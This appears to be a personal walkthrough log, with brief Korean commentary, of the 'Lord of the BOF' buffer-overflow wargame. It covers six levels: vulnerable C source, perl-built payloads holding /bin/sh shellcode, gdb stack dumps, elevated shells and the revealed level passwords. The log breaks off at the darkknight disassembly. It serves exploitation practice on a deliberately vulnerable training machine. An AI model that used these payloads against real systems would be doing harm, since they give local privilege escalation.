"`perl -e '{print "A"x40,"BBBB","\x3a\xfc\xff\xbf"}'`" "`perl -e '{print "\x31\xc0\x31\xdb\xb0\x17\xcd\x80\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff/bin/sh"}'`"
[wolfman@localhost wolfman]$ ./darkelf "`perl -e '{print "A"x40,"BBBB","\x3a\xfc\xff\xbf"}'`" "`perl -e '{print "\x31\xc0\x31\xdb\xb0\x17\xcd\x80\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff/bin/sh"}'`"
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBB:??
bash$ whoami
darkelf
bash$ id
uid=505(wolfman) gid=505(wolfman) euid=506(darkelf) egid=506(darkelf) groups=505(wolfman)
bash$ /bin/my-pass
euid = 506
kernel crashed
bash$
================================================================================
[darkelf@localhost darkelf]$ cat orge.c
/*
The Lord of the BOF : The Fellowship of the BOF
- orge
- check argv[0]
*/
#include <stdio.h>
#include <stdlib.h>
extern char **environ;
main(int argc, char *argv[])
{
char buffer[40];
int i;
if(argc < 2){
printf("argv error\n");
exit(0);
}
// here is changed!
if(strlen(argv[0]) != 77){
printf("argv[0] error\n");
exit(0);
}
// egghunter
for(i=0; environ[i]; i++)
memset(environ[i], 0, strlen(environ[i]));
if(argv[1][47] != '\xbf')
{
printf("stack is still your friend.\n");
exit(0);
}
// check the length of argument
if(strlen(argv[1]) > 48){
printf("argument is too long!\n");
exit(0);
}
strcpy(buffer, argv[1]);
printf("%s\n", buffer);
// buffer hunter
memset(buffer, 0, 40);
}
[darkelf@localhost darkelf]$
결국엔 파일명으로 해야하나-_-;;
그냥 파일명 길이를 늘리고 두번째 아규먼트로 하면 될거같긴한데ㅡ.ㅡ; 원하는데로 풀어주자...
그러기 위해선......... / (0x2f)가 없는 쉘코드를 만들어야하는데..
shellcode 만드는 방법을 공부해볼까..-_-;
했는데..귀찮네....그냥 인터넷에서 구하자..
// 25byte shellcode
`perl -e 'print "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80"'`
// /(%2f) 없는 shellcode (48byte)
"\xeb\x11\x5e\x31\xc9\xb1\x32\x80\x6c\x0e\xff\x01\x80\xe9\x01\x75\xf6\xeb\x05\xe8\xea\xff\xff\xff\x32\xc1\x51\x69\x30\x30\x74\x69\x69\x30\x63\x6a\x6f\x8a\xe4\x51\x54\x8a\xe2\x9a\xb1\x0c\xce\x81"
77-48 = 29
./ 이 추가되므로 27byte padding.
ln -s tttt "`perl -e '{print "\x90"x27,"\xeb\x11\x5e\x31\xc9\xb1\x32\x80\x6c\x0e\xff\x01\x80\xe9\x01\x75\xf6\xeb\x05\xe8\xea\xff\xff\xff\x32\xc1\x51\x69\x30\x30\x74\x69\x69\x30\x63\x6a\x6f\x8a\xe4\x51\x54\x8a\xe2\x9a\xb1\x0c\xce\x81"}'`"
[darkelf@localhost darkelf]$ ./`perl -e '{print "\x90"x27,"\xeb\x11\x5e\x31\xc9\xb1\x32\x80\x6c\x0e\xff\x01\x80\xe9\x01\x75\xf6\xeb\x05\xe8\xea\xff\xff\xff\x32\xc1\x51\x69\x30\x30\x74\x69\x69\x30\x63\x6a\x6f\x8a\xe4\x51\x54\x8a\xe2\x9a\xb1\x0c\xce\x81"}'` `perl -e '{print "A"x40,"BBBB", "CCC\xbf"}'`
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBBCCC?
Segmentation fault (core dumped)
0xbffffb50: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffb60: 0x00000000 0x36383669 0x902f2e00 0x90909090
0xbffffb70: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffffb80: 0x90909090 0x11eb9090 0xb1c9315e 0x0e6c8032
0xbffffb90: 0xe98001ff 0xebf67501 0xffeae805 0xc132ffff
0xbffffba0: 0x30306951 0x30696974 0x8a6f6a63 0x8a5451e4
0xbffffbb0: 0x0cb19ae2 0x410081ce 0x41414141 0x41414141
(gdb)
0xbffffbc0: 0x41414141 0x41414141 0x41414141 0x41414141
0xbffffbd0: 0x41414141 0x41414141 0x41414141 0x42414141
0xbffffbe0: 0x43424242 0x00bf4343 0x00000000 0x00000000
0xbffffbf0: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffc00: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffc10: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffc20: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffc30: 0x00000000 0x00000000 0x00000000 0x00000000
[darkelf@localhost darkelf]$ ./`perl -e '{print "\x90"x27,"\xeb\x11\x5e\x31\xc9\xb1\x32\x80\x6c\x0e\xff\x01\x80\xe9\x01\x75\xf6\xeb\x05\xe8\xea\xff\xff\xff\x32\xc1\x51\x69\x30\x30\x74\x69\x69\x30\x63\x6a\x6f\x8a\xe4\x51\x54\x8a\xe2\x9a\xb1\x0c\xce\x81"}'` `perl -e '{print "A"x40,"BBBB", "\x70\xfb\xff\xbf"}'`
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBBp??
bash$ exit
[darkelf@localhost darkelf]$ ln -s orge "`perl -e '{print "\x90"x27,"\xeb\x11\x5e\x31\xc9\xb1\x32\x80\x6c\x0e\xff\x01\x80\xe9\x01\x75\xf6\xeb\x05\xe8\xea\xff\xff\xff\x32\xc1\x51\x69\x30\x30\x74\x69\x69\x30\x63\x6a\x6f\x8a\xe4\x51\x54\x8a\xe2\x9a\xb1\x0c\xce\x81"}'`"
[darkelf@localhost darkelf]$ ./`perl -e '{print "\x90"x27,"\xeb\x11\x5e\x31\xc9\xb1\x32\x80\x6c\x0e\xff\x01\x80\xe9\x01\x75\xf6\xeb\x05\xe8\xea\xff\xff\xff\x32\xc1\x51\x69\x30\x30\x74\x69\x69\x30\x63\x6a\x6f\x8a\xe4\x51\x54\x8a\xe2\x9a\xb1\x0c\xce\x81"}'` `perl -e '{print "A"x40,"BBBB", "\x70\xfb\xff\xbf"}'`
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBBp??
bash$ whoami
orge
bash$ id
uid=506(darkelf) gid=506(darkelf) euid=507(orge) egid=507(orge) groups=506(darkelf)
bash$ /bin/my-pass
euid = 507
timewalker
bash$
==================================================================================
[orge@localhost orge]$ cat troll.c
/*
The Lord of the BOF : The Fellowship of the BOF
- troll
- check argc + argv hunter
*/
#include <stdio.h>
#include <stdlib.h>
extern char **environ;
main(int argc, char *argv[])
{
char buffer[40];
int i;
// here is changed
if(argc != 2){
printf("argc must be two!\n");
exit(0);
}
// egghunter
for(i=0; environ[i]; i++)
memset(environ[i], 0, strlen(environ[i]));
if(argv[1][47] != '\xbf')
{
printf("stack is still your friend.\n");
exit(0);
}
// check the length of argument
if(strlen(argv[1]) > 48){
printf("argument is too long!\n");
exit(0);
}
strcpy(buffer, argv[1]);
printf("%s\n", buffer);
// buffer hunter
memset(buffer, 0, 40);
// one more!
memset(argv[1], 0, strlen(argv[1]));
}
[orge@localhost orge]$
=================================================================================
[orge@localhost orge]$ ln -s ttttt "`perl -e '{print "\x90"x27,"\xeb\x11\x5e\x31\xc9\xb1\x32\x80\x6c\x0e\xff\x01\x80\xe9\x01\x75\xf6\xeb\x05\xe8\xea\xff\xff\xff\x32\xc1\x51\x69\x30\x30\x74\x69\x69\x30\x63\x6a\x6f\x8a\xe4\x51\x54\x8a\xe2\x9a\xb1\x0c\xce\x81"}'`"
[orge@localhost orge]$ ./`perl -e '{print "\x90"x27,"\xeb\x11\x5e\x31\xc9\xb1\x32\x80\x6c\x0e\xff\x01\x80\xe9\x01\x75\xf6\xeb\x05\xe8\xea\xff\xff\xff\x32\xc1\x51\x69\x30\x30\x74\x69\x69\x30\x63\x6a\x6f\x8a\xe4\x51\x54\x8a\xe2\x9a\xb1\x0c\xce\x81"}'` `perl -e '{print "A"x40,"BBBB", "\x70\xfb\xff\xbf"}'`
(gdb) x/100x $esp
0xbffffa40: 0x00000000 0xbffffa84 0xbffffa90 0x40013868
0xbffffa50: 0x00000002 0x08048450 0x00000000 0x08048471
0xbffffa60: 0x08048500 0x00000002 0xbffffa84 0x08048390
0xbffffa70: 0x0804866c 0x4000ae60 0xbffffa7c 0x40013e90
0xbffffa80: 0x00000002 0xbffffb7e 0xbffffbcc 0x00000000
0xbffffa90: 0xbffffbfd 0xbffffc0c 0xbffffc24 0xbffffc43
0xbffffaa0: 0xbffffc65 0xbffffc6f 0xbffffe32 0xbffffe51
0xbffffab0: 0xbffffe6b 0xbffffe80 0xbffffe9c 0xbffffea7
0xbffffac0: 0xbffffeb4 0xbffffebc 0xbffffec6 0xbffffed6
0xbffffad0: 0xbffffee4 0xbffffef2 0xbfffff03 0xbfffff0e
0xbffffae0: 0xbfffff1e 0xbfffff5e 0x00000000 0x00000003
0xbffffaf0: 0x08048034 0x00000004 0x00000020 0x00000005
0xbffffb00: 0x00000006 0x00000006 0x00001000 0x00000007
0xbffffb10: 0x40000000 0x00000008 0x00000000 0x00000009
0xbffffb20: 0x08048450 0x0000000b 0x000001fb 0x0000000c
0xbffffb30: 0x000001fb 0x0000000d 0x000001fb 0x0000000e
0xbffffb40: 0x000001fb 0x00000010 0x0fabfbff 0x0000000f
0xbffffb50: 0xbffffb79 0x00000000 0x00000000 0x00000000
0xbffffb60: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffb70: 0x00000000 0x00000000 0x38366900 0x2f2e0036
0xbffffb80: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffffb90: 0x90909090 0x90909090 0xeb909090 0xc9315e11
0xbffffba0: 0x6c8032b1 0x8001ff0e 0xf67501e9 0xeae805eb
0xbffffbb0: 0x32ffffff 0x306951c1 0x69697430 0x6f6a6330
0xbffffbc0: 0x5451e48a 0xb19ae28a 0x0081ce0c 0x00000030
(gdb) q
[orge@localhost orge]$
[orge@localhost orge]$ ln -s troll "`perl -e '{print "\x90"x27,"\xeb\x11\x5e\x31\xc9\xb1\x32\x80\x6c\x0e\xff\x01\x80\xe9\x01\x75\xf6\xeb\x05\xe8\xea\xff\xff\xff\x32\xc1\x51\x69\x30\x30\x74\x69\x69\x30\x63\x6a\x6f\x8a\xe4\x51\x54\x8a\xe2\x9a\xb1\x0c\xce\x81"}'`"
[orge@localhost orge]$ ./`perl -e '{print "\x90"x27,"\xeb\x11\x5e\x31\xc9\xb1\x32\x80\x6c\x0e\xff\x01\x80\xe9\x01\x75\xf6\xeb\x05\xe8\xea\xff\xff\xff\x32\xc1\x51\x69\x30\x30\x74\x69\x69\x30\x63\x6a\x6f\x8a\xe4\x51\x54\x8a\xe2\x9a\xb1\x0c\xce\x81"}'` `perl -e '{print "A"x40,"BBBB", "\x80\xfb\xff\xbf"}'`
bash$ whoami
troll
bash$ id
uid=507(orge) gid=507(orge) euid=508(troll) egid=508(troll) groups=507(orge)
bash$ whoami
troll
bash$ /bin/my-pass
euid = 508
aspirin
bash$
========================================================================
[troll@localhost troll]$ cat vampire.c
/*
The Lord of the BOF : The Fellowship of the BOF
- vampire
- check 0xbfff
*/
#include <stdio.h>
#include <stdlib.h>
main(int argc, char *argv[])
{
char buffer[40];
if(argc < 2){
printf("argv error\n");
exit(0);
}
if(argv[1][47] != '\xbf')
{
printf("stack is still your friend.\n");
exit(0);
}
// here is changed!
if(argv[1][46] == '\xff')
{
printf("but it's not forever\n");
exit(0);
}
strcpy(buffer, argv[1]);
printf("%s\n", buffer);
}
[troll@localhost troll]$
========================================================================
흠..버퍼를 늘려야겠군..-_-
[troll@localhost troll]$ ./ttttttt "`perl -e '{print "A"x40,"BBBB","AA\xfa\xbf"}'`" "`perl -e '{print "A"x100000}'`"
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBBAA嚮
Segmentation fault (core dumped)
(gdb) x/100x $esp
0xbffe7460: 0x00000000 0xbffe74a4 0xbffe74b4 0x40013868
0xbffe7470: 0x00000003 0x08048380 0x00000000 0x080483a1
0xbffe7480: 0x08048430 0x00000003 0xbffe74a4 0x080482e0
0xbffe7490: 0x080484fc 0x4000ae60 0xbffe749c 0x40013e90
0xbffe74a0: 0x00000003 0xbffe75a2 0xbffe75ac 0xbffe75dd
0xbffe74b0: 0x00000000 0xbffffc7e 0xbffffc8e 0xbffffca6
0xbffe74c0: 0xbffffcc5 0xbffffce7 0xbffffcf2 0xbffffeb5
0xbffe74d0: 0xbffffed4 0xbffffeef 0xbfffff04 0xbfffff21
0xbffe74e0: 0xbfffff2c 0xbfffff3a 0xbfffff42 0xbfffff4c
0xbffe74f0: 0xbfffff5c 0xbfffff6a 0xbfffff78 0xbfffff89
0xbffe7500: 0xbfffff94 0xbfffffa5 0xbfffffe6 0x00000000
0xbffe7510: 0x00000003 0x08048034 0x00000004 0x00000020
0xbffe7520: 0x00000005 0x00000006 0x00000006 0x00001000
0xbffe7530: 0x00000007 0x40000000 0x00000008 0x00000000
0xbffe7540: 0x00000009 0x08048380 0x0000000b 0x000001fc
0xbffe7550: 0x0000000c 0x000001fc 0x0000000d 0x000001fc
0xbffe7560: 0x0000000e 0x000001fc 0x00000010 0x0fabfbff
0xbffe7570: 0x0000000f 0xbffe759d 0x00000000 0x00000000
0xbffe7580: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffe7590: 0x00000000 0x00000000 0x00000000 0x38366900
0xbffe75a0: 0x2f2e0036 0x74747474 0x00747474 0x41414141
0xbffe75b0: 0x41414141 0x41414141 0x41414141 0x41414141
0xbffe75c0: 0x41414141 0x41414141 0x41414141 0x41414141
0xbffe75d0: 0x41414141 0x42424242 0xbffa4141 0x41414100
0xbffe75e0: 0x41414141 0x41414141 0x41414141 0x41414141
(gdb)
0xbffe75f0: 0x41414141 0x41414141 0x41414141 0x41414141
0xbffe7600: 0x41414141 0x41414141 0x41414141 0x41414141
0xbffe7610: 0x41414141 0x41414141 0x41414141 0x41414141
0xbffe7620: 0x41414141 0x41414141 0x41414141 0x41414141
0xbffe7630: 0x41414141 0x41414141 0x41414141 0x41414141
0xbffe7640: 0x41414141 0x41414141 0x41414141 0x41414141
0xbffe7650: 0x41414141 0x41414141 0x41414141 0x41414141
0xbffe7660: 0x41414141 0x41414141 0x41414141 0x41414141
0xbffe7670: 0x41414141 0x41414141 0x41414141 0x41414141
0xbffe7680: 0x41414141 0x41414141 0x41414141 0x41414141
0xbffe7690: 0x41414141 0x41414141 0x41414141 0x41414141
0xbffe76a0: 0x41414141 0x41414141 0x41414141 0x41414141
0xbffe76b0: 0x41414141 0x41414141 0x41414141 0x41414141
[troll@localhost troll]$ ./ttttttt "`perl -e '{print "A"x40,"BBBB","\xb0\x76\xfe\xbf"}'`" "`perl -e '{print "\x90"x100000,"\x31\xc0\x31\xdb\xb0\x17\xcd\x80\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff/bin/sh"}'`"
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBB컑
bash$ exit
[troll@localhost troll]$ ./ "`perl -e '{print "A"x40,"BBBB","\xb0\x76\xfe\xbf"}'`" "`perl -e '{print "\x90"x100000,"\x31\xc0\x31\xdb\xb0\x17\xcd\x80\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff/bin/sh"}'`"
.emacs ttttttt vampire
[troll@localhost troll]$ ./vampire "`perl -e '{print "A"x40,"BBBB","\xb0\x76\xfe\xbf"}'`" "`perl -e '{print "\x90"x100000,"\x31\xc0\x31\xdb\xb0\x17\xcd\x80\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff/bin/sh"}'`"
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBB컑
bash$ id
uid=508(troll) gid=508(troll) euid=509(vampire) egid=509(vampire) groups=508(troll)
bash$ whoami
vampire
bash$ id
uid=508(troll) gid=508(troll) euid=509(vampire) egid=509(vampire) groups=508(troll)
bash$ /bin/my-pass
euid = 509
music world
bash$
bash$
================================================================================================
[vampire@localhost vampire]$ cat skeleton.c
/*
The Lord of the BOF : The Fellowship of the BOF
- skeleton
- argv hunter
*/
#include <stdio.h>
#include <stdlib.h>
extern char **environ;
main(int argc, char *argv[])
{
char buffer[40];
int i, saved_argc;
if(argc < 2){
printf("argv error\n");
exit(0);
}
// egghunter
for(i=0; environ[i]; i++)
memset(environ[i], 0, strlen(environ[i]));
if(argv[1][47] != '\xbf')
{
printf("stack is still your friend.\n");
exit(0);
}
// check the length of argument
if(strlen(argv[1]) > 48){
printf("argument is too long!\n");
exit(0);
}
// argc saver
saved_argc = argc;
strcpy(buffer, argv[1]);
printf("%s\n", buffer);
// buffer hunter
memset(buffer, 0, 40);
// ultra argv hunter!
for(i=0; i<saved_argc; i++)
memset(argv[i], 0, strlen(argv[i]));
}
[vampire@localhost vampire]$
========================================================================================
ln -s tttttttt "`perl -e '{print "\x90"x100,"\xeb\x11\x5e\x31\xc9\xb1\x32\x80\x6c\x0e\xff\x01\x80\xe9\x01\x75\xf6\xeb\x05\xe8\xea\xff\xff\xff\x32\xc1\x51\x69\x30\x30\x74\x69\x69\x30\x63\x6a\x6f\x8a\xe4\x51\x54\x8a\xe2\x9a\xb1\x0c\xce\x81","\x90"x100}'`"
./"`perl -e '{print "\x90"x100,"\xeb\x11\x5e\x31\xc9\xb1\x32\x80\x6c\x0e\xff\x01\x80\xe9\x01\x75\xf6\xeb\x05\xe8\xea\xff\xff\xff\x32\xc1\x51\x69\x30\x30\x74\x69\x69\x30\x63\x6a\x6f\x8a\xe4\x51\x54\x8a\xe2\x9a\xb1\x0c\xce\x81","\x90"x100}'`" "`perl -e '{print "A"x40,"BBBB", "\xc0\xff\xff\xbf"}'`"
0xbfffff80: 0x00000000 0x00000000 0x00000000 0x00000000
0xbfffff90: 0x00000000 0x00000000 0x00000000 0x00000000
0xbfffffa0: 0x00000000 0x00000000 0x00000000 0x2f2e0000
0xbfffffb0: 0x90909090 0x90909090 0x90909090 0x90909090
0xbfffffc0: 0x90909090 0x90909090 0xeb909090 0xc9315e11
0xbfffffd0: 0x6c8032b1 0x8001ff0e 0xf67501e9 0xeae805eb
0xbfffffe0: 0x32ffffff 0x306951c1 0x69697430 0x6f6a6330
0xbffffff0: 0x5451e48a 0xb19ae28a 0x0081ce0c 0x00000000
0xc0000000: Cannot access memory at address 0xc0000000
ln -s tttttttt "`perl -e '{print "\x90"x100,"\xeb\x11\x5e\x31\xc9\xb1\x32\x80\x6c\x0e\xff\x01\x80\xe9\x01\x75\xf6\xeb\x05\xe8\xea\xff\xff\xff\x32\xc1\x51\x69\x30\x30\x74\x69\x69\x30\x63\x6a\x6f\x8a\xe4\x51\x54\x8a\xe2\x9a\xb1\x0c\xce\x81","\x90"x100}'`"
./"`perl -e '{print "\x90"x100,"\xeb\x11\x5e\x31\xc9\xb1\x32\x80\x6c\x0e\xff\x01\x80\xe9\x01\x75\xf6\xeb\x05\xe8\xea\xff\xff\xff\x32\xc1\x51\x69\x30\x30\x74\x69\x69\x30\x63\x6a\x6f\x8a\xe4\x51\x54\x8a\xe2\x9a\xb1\x0c\xce\x81","\x90"x100}'`" "`perl -e '{print "A"x40,"BBBB", "\x20\xff\xff\xbf"}'`"
뒤에 버퍼가 필요한 것 같다.
[vampire@localhost vampire]$ ln -s skeleton "`perl -e '{print "\x90"x100,"\xeb\x11\x5e\x31\xc9\xb1\x32\x80\x6c\x0e\xff\x01\x80\xe9\x01\x75\xf6\xeb\x05\xe8\xea\xff\xff\xff\x32\xc1\x51\x69\x30\x30\x74\x69\x69\x30\x63\x6a\x6f\x8a\xe4\x51\x54\x8a\xe2\x9a\xb1\x0c\xce\x81","\x90"x100}'`"
[vampire@localhost vampire]$ ./"`perl -e '{print "\x90"x100,"\xeb\x11\x5e\x31\xc9\xb1\x32\x80\x6c\x0e\xff\x01\x80\xe9\x01\x75\xf6\xeb\x05\xe8\xea\xff\xff\xff\x32\xc1\x51\x69\x30\x30\x74\x69\x69\x30\x63\x6a\x6f\x8a\xe4\x51\x54\x8a\xe2\x9a\xb1\x0c\xce\x81","\x90"x100}'`" "`perl -e '{print "A"x40,"BBBB", "\x20\xff\xff\xbf"}'`"
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBB ?
bash$ id
uid=509(vampire) gid=509(vampire) euid=510(skeleton) egid=510(skeleton) groups=509(vampire)
bash$ whoami
skeleton
bash$ id
uid=509(vampire) gid=509(vampire) euid=510(skeleton) egid=510(skeleton) groups=509(vampire)
bash$ /bin/my-pass
euid = 510
shellcoder
bash$
================================================================================
[skeleton@localhost skeleton]$ cat golem.c
/*
The Lord of the BOF : The Fellowship of the BOF
- golem
- stack destroyer
*/
#include <stdio.h>
#include <stdlib.h>
extern char **environ;
main(int argc, char *argv[])
{
char buffer[40];
int i;
if(argc < 2){
printf("argv error\n");
exit(0);
}
if(argv[1][47] != '\xbf')
{
printf("stack is still your friend.\n");
exit(0);
}
strcpy(buffer, argv[1]);
printf("%s\n", buffer);
// stack destroyer!
memset(buffer, 0, 44);
memset(buffer+48, 0, 0xbfffffff - (int)(buffer+48));
}
[skeleton@localhost skeleton]$
흠..스택을 다 밀어버리네ㅡ.ㅡ;;
환경변수도 안되고..아규먼트도 안되고-_-;
EIP만 딱 바꿀수있네..
"\x31\xc0\x31\xdb\xb0\x17\xcd\x80\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff/bin/sh"
그럼..printf의 출력 버퍼를 써볼까?..
$2 = (FILE *) 0x40106980
(gdb) x/x 0x40106980
0x40106980 <_IO_2_1_stdout_>: 0xfbad2a84
(gdb)
0x40106984 <_IO_2_1_stdout_+4>: 0x40015000
(gdb)
0x40106988 <_IO_2_1_stdout_+8>: 0x40015000
(gdb)
0x4010698c <_IO_2_1_stdout_+12>: 0x40015000
(gdb)
0x40106990 <_IO_2_1_stdout_+16>: 0x40015000
(gdb)
0x40106994 <_IO_2_1_stdout_+20>: 0x40015000
(gdb)
0x40106998 <_IO_2_1_stdout_+24>: 0x40015000
(gdb)
0x4010699c <_IO_2_1_stdout_+28>: 0x40015000
(gdb)
0x401069a0 <_IO_2_1_stdout_+32>: 0x40015400
(gdb)
0x401069a4 <_IO_2_1_stdout_+36>: 0x00000000
(gdb)
0x401069a8 <_IO_2_1_stdout_+40>: 0x00000000
(gdb)
0x401069ac <_IO_2_1_stdout_+44>: 0x00000000
(gdb) x/x 0x40015000
0x40015000: 0x41414141
(gdb)
0x40015004: 0x41414141
(gdb)
0x40015008: 0x41414141
(gdb)
0x4001500c: 0x41414141
출력버터의 시작은 0x40015000인데. null 바이트가 있네..-_-;
흠...그리고 0xbf로 시작하는 주소여야하네....우회할 방법은?..
흠냥..결국 인터넷 찾아봄.-_-
LD_PRELOAD 환경 변수를 사용해야함.
동적링크되는 파일명이 스택에 저장됨. 이를 이용해서 exploit 가능함..-_-
흠냥..............................거뤠....거러쿤-_-;;
gcc -shared -Wl,-soname,"`perl -e '{print "\x90"x100,"\xeb\x11\x5e\x31\xc9\xb1\x32\x80\x6c\x0e\xff\x01\x80\xe9\x01\x75\xf6\xeb\x05\xe8\xea\xff\xff\xff\x32\xc1\x51\x69\x30\x30\x74\x69\x69\x30\x63\x6a\x6f\x8a\xe4\x51\x54\x8a\xe2\x9a\xb1\x0c\xce\x81"}'`".so.1 -o "`perl -e '{print "\x90"x100,"\xeb\x11\x5e\x31\xc9\xb1\x32\x80\x6c\x0e\xff\x01\x80\xe9\x01\x75\xf6\xeb\x05\xe8\xea\xff\xff\xff\x32\xc1\x51\x69\x30\x30\x74\x69\x69\x30\x63\x6a\x6f\x8a\xe4\x51\x54\x8a\xe2\x9a\xb1\x0c\xce\x81"}'`".so.1.0.1 ld.o -lc
export LD_PRELOAD="`perl -e '{print "\x90"x100,"\xeb\x11\x5e\x31\xc9\xb1\x32\x80\x6c\x0e\xff\x01\x80\xe9\x01\x75\xf6\xeb\x05\xe8\xea\xff\xff\xff\x32\xc1\x51\x69\x30\x30\x74\x69\x69\x30\x63\x6a\x6f\x8a\xe4\x51\x54\x8a\xe2\x9a\xb1\x0c\xce\x81"}'`".so.1.0.1
gcc -shared -Wl,-soname,"`perl -e '{print "\xeb\x11\x5e\x31\xc9\xb1\x32\x80\x6c\x0e\xff\x01\x80\xe9\x01\x75\xf6\xeb\x05\xe8\xea\xff\xff\xff\x32\xc1\x51\x69\x30\x30\x74\x69\x69\x30\x63\x6a\x6f\x8a\xe4\x51\x54\x8a\xe2\x9a\xb1\x0c\xce\x81"}'`".so.1 -o "`perl -e '{print "\xeb\x11\x5e\x31\xc9\xb1\x32\x80\x6c\x0e\xff\x01\x80\xe9\x01\x75\xf6\xeb\x05\xe8\xea\xff\xff\xff\x32\xc1\x51\x69\x30\x30\x74\x69\x69\x30\x63\x6a\x6f\x8a\xe4\x51\x54\x8a\xe2\x9a\xb1\x0c\xce\x81"}'`".so.1.0.1 ld.o -lc
export LD_PRELOAD="`perl -e '{print "/home/skeleton/\xeb\x11\x5e\x31\xc9\xb1\x32\x80\x6c\x0e\xff\x01\x80\xe9\x01\x75\xf6\xeb\x05\xe8\xea\xff\xff\xff\x32\xc1\x51\x69\x30\x30\x74\x69\x69\x30\x63\x6a\x6f\x8a\xe4\x51\x54\x8a\xe2\x9a\xb1\x0c\xce\x81"}'`".so.1.0.1
0xbffff620: 0x40013868 0xbffff7a4 0x4000380e 0x40014420
0xbffff630: 0x6d6f682f 0x6b732f65 0x74656c65 0xeb2f6e6f
0xbffff640: 0xc9315e11 0x6c8032b1 0x8001ff0e 0xf67501e9
0xbffff650: 0xeae805eb 0x32ffffff 0x306951c1 0x69697430
0xbffff660: 0x6f6a6330 0x5451e48a 0xb19ae28a 0x2e81ce0c
0xbffff670: 0x312e6f73 0x312e302e 0x40002900 0x40013868
0xbffff680: 0x4000220c 0xbffffbc1 0x00000000 0x00000000
0xbffff690: 0x00000000 0x00000000 0x40014900 0x00000000
0xbffff63f
[skeleton@localhost skeleton]$ ./ttttt "`perl -e '{print "A"x40,"BBBB","\x3f\xf6\xff\xbf"}'`"
[skeleton@localhost skeleton]$ ./golem "`perl -e '{print "A"x40,"BBBB","\x3f\xf6\xff\xbf"}'`"
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBB??
bash$ id
uid=510(skeleton) gid=510(skeleton) euid=511(golem) egid=511(golem) groups=510(skeleton)
bash$ whoami
golem
bash$ /bin/my-pass
euid = 511
cup of coffee
bash$
============================================================================================
[golem@localhost golem]$ cat darkknight.c
/*
The Lord of the BOF : The Fellowship of the BOF
- darkknight
- FPO
*/
#include <stdio.h>
#include <stdlib.h>
void problem_child(char *src)
{
char buffer[40];
strncpy(buffer, src, 41);
printf("%s\n", buffer);
}
main(int argc, char *argv[])
{
if(argc<2){
printf("argv error\n");
exit(0);
}
problem_child(argv[1]);
}
[golem@localhost golem]$
============================================================================================
08048440 <problem_child>:
8048440: 55 push %ebp
8048441: 89 e5 mov %esp,%ebp
8048443: 83 ec 28 sub $0x28,%esp
8048446: 6a 29 push $0x29
8048448: 8b 45 08 mov 0x8(%ebp),%eax
804844b: 50 push %eax
804844c: 8d 45 d8 lea 0xffffffd8(%ebp),%eax
804844f: 50 push %eax
8048450: e8 1f ff ff ff call 8048374 <_init+0x90>
8048455: 83 c4 0c add $0xc,%esp
8048458: 8d 45 d8 lea 0xffffffd8(%ebp),%eax
804845b: 50 push %eax
804845c: 68 00 85 04 08 push $0x8048500
8048461: e8 ee fe ff ff call 8048354 <_init+0x70>
8048466: 83 c4 08 add $0x8,%esp
8048469: c9 leave
804846a: c3 ret
804846b: 90 nop
0804846c <main>:
804846c: 55 push %ebp
804846d: 89 e5 mov %esp,%ebp
804846f: 83 7d 08 01 cmpl $0x1,0x8(%ebp)
8048473: 7f 1b jg 8048490 <main+0x24>
8048475: 68 04 85 04 08 push $0x8048504
804847a: e8 d5 fe ff ff call 8048354 <_init+0x70>
804847f: 83 c4 04 add $0x4,%esp
8048482: 6a 00 push $0x0
8048484: e8 db fe ff ff call 8048364 <_init+0x80>
8048489: 83 c4 04 add $0x4,%esp
804848c: 8d 74 26 00 lea 0x0(%esi,1),%esi
8048490: 8b 45 0c mov 0xc(%ebp),%eax
8048493: 83 c0 04 add $0x4,%eax
8048496: 8b 10 mov (%eax),%edx
8048498: 52 push %edx
8048499: e8 a2 ff ff ff call 8048440 <problem_child>
804849e: 83 c4 04 add $0x4,%esp
